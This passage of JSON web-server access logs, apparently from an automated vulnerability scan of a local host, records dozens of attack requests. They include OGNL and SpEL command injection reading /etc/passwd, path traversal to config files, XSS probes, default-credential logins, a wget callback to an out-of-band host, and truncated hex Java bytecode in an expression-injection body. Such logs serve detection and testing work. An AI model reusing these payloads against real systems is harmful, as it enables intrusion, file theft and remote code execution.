HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"loginwith=suslogin&username=webadmin&password=webadmin&submit=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ca28fg0smpvbd3qg07h0rab7eze95wkd5.oast.live)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(29KD20vhafqXKWYvNryHgc01fU8)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e7457726